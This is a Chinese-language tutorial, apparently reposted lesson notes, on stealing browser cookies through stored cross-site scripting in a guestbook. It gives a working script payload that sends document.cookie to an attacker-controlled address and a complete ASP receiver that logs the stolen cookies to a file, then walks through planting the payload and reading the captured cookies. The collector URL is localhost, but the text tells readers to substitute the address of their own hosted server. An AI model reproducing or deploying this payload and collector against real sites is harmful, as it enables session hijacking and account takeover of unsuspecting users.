1.跨站的概念

1.跨站要分为两类：

一类是存储型XSS，主要出现在让用户输入数据，供其他浏览此页的用户进行查看的地方，包括留言、评论、博客日志和各类表单等。应用程序从数据库中查询数据，在页面中显示出来，攻击者在相关页面输入恶意的脚本数据后，用户浏览此类页面就可能受到攻击。另外一类是参数型XSS，主要是将脚本加入URL地址的程序参数里，参数进入程序后在页面直接输出脚本内容，用户点击类似的恶意链接就可能受到攻击。传统的XSS攻击都是盘算如何盗取客户端COOKIE，然后劫持客户端和WEB服务端的会话，其他还有利用XSS进行网络钓鱼的攻击方法，这类攻击都是针对客户端进行攻击，而近年流行的XSS WORM攻击方式，是通过AJAX技术把恶意的XSS数据感染到每一个用户，可以对WEB服务造成很大的影响，间接实现了对WEB服务端的攻击。《也就是这种》

2.代码的解释

 2.用到的代码是

<script>document.location=’http://127.0.0.1/1.asp?msg=’+document.cookie</script>

相信这一句大家都熟悉吧

我们还要用到一个asp接口啊

<%

thisfile=Server.MapPath(“cookie.txt”)

msg=Request(“msg”)

set fs=server.CreateObject(“scripting.filesystemobject”)

set thisfile=fs.OpenTextFile(thisfile,8,True,0)

thisfile.WriteLine(“========cookie:”&msg&”======================[by:]=黑防”)

thisfile.close

set fs = nothing

%>   

1. server对象

server对象提供对服务器上的方法和属性的访问，其中大多数方法和属性是作为实用程序的功能的，语法格式为：

server.property method

其中property和method分别表示属性和方法

server对象的方法：

creareobject：创建服务器组件的实例。

execute：执行一个.asp文件

getlasterror：返回一个描述错误条件的asperror对象

htmlencode;将html编码应用到指定的字符串

mappath：将指定的虚拟路径，无论是当前服务器上的绝对路径还是当前页的相对路径，映射为物理路径

transfer：将当前所有的状态信息发送给另一个.asp文件进行处理

urlencode：将url编码规则，包括转移字符，应用到字符串。

2.使用server对象的createobject方法可以创建服务器组件的实例，语法格式如下：

server.mappath(path)

其中参数path指定要映射物理目录的相对或虚拟路径。如果path以一个正斜线(/)或反斜线（\）开始，mappath方法将返回路径时将path视为完整的虚拟路径；如果path不是斜线开始，mappath方法将返回相对于.asp文件已有的路径的路径。

3.filesystemobject主对象。提供对计算机文件系统的访问，包括用来创建，删除，和获得有关信息以及用来操作驱动器，文件夹和文件的方法和属性。

4.要创建一个文本文件并对其进行写操作，首先创建filesystemobject对象实例，然后通过调用该对象的createtextfile方法创建指定文件并返回textstream对象实例，接着使用textstream对象的方法对文件进行写操作并关闭文件

5.打开文件

filesystemobject对象的 opentextfile方法打开指定的文件并返回一个textstream对象，该对象可以用于对文件进行读，写和添加到结尾操作

语法格式

object.opentextfile（file【，iomode【，create【，format】】】）

其中object是必选参数，指定vfilesystemobject对象名称

filename也是必选参数，是一个字符串表达式，用于指定要打开的文件名称。

iomode 是可选参数，用于指定文件的输入，输出模式：如果该参数为1，或省掉，则以只读打开文件，不能写；如果2，只能对其写 不能读，如果为8 则是在文件末尾进行写操作

create是可选参数，取boolean值 指出当指定的filename不存在时是否能创建；如果为TRUE，则可以；如果false或省掉，则不能创建

vformat是可选参数，如果为0 后省掉 则以ascii格式打开文件；如果为-1，以unicode格式打开文件；如果为-2，则以系统默认格式打开文件

6.使用writeline方法向textstream文件写入指定字符串和新字符串，语法

object.writeline（【string】）

其中object是必选参数，指定textstream对象的名称。string是可选参数，指定写入的文件。如果省掉，将向文件新行字符

由于我的电脑没有连网所以就只能用本地做实验 啊

首先 把asp文件传到自己的空间里啊

好 了

再到网站提交数据啊

哦忘记说了

这里写的http://127.0.0.1/1.asp 是你自己传到空间的地址 后面的msg 就是这里的参数

实际操作

我们今天就是以留言版为例地到cookie

下一节课讲 怎么利用

我们今天就不分析代码

那是后来的问题

今天只是讲怎么获得

今天大家不用理解为什么会是这样的

我们以后要讲的

开始 二节课是让大家明白他的危害

在 以后的课程里 我们就不讲怎么获得cookie

只讲

存在的问题

啊

我们是 以留言板为例

还是进入今天的主题啊

很简单啊

特别是代码分析的时候啊

我们找一个留言的地方啊

再给 我们获取cookie的代码写上啊

哈哈

好像看不出效果啊

我差点忘记了

代码没有改

汗

我们进入后台看看

哈哈

看到没有啊、]

好了

内容来自嘟嘟资源网

原文链接：https://duduziy.com/440.html，转载请注明出处。 郑重声明： 本站所有内容仅供大家参考、学习，不存在任何商业目的与商业用途。 若您需要商业运营或用于其他商业活动，请您购买正版授权并合法使用。 我们不承担任何技术及版权问题，且不对任何资源负法律责任。 如遇到资源无法下载，请点击这里失效报错。失效报错提交后记得查看你的留言信息，24小时之内反馈信息。 如有侵犯您的版权，请给我们私信，我们会尽快处理，并诚恳的向你道歉！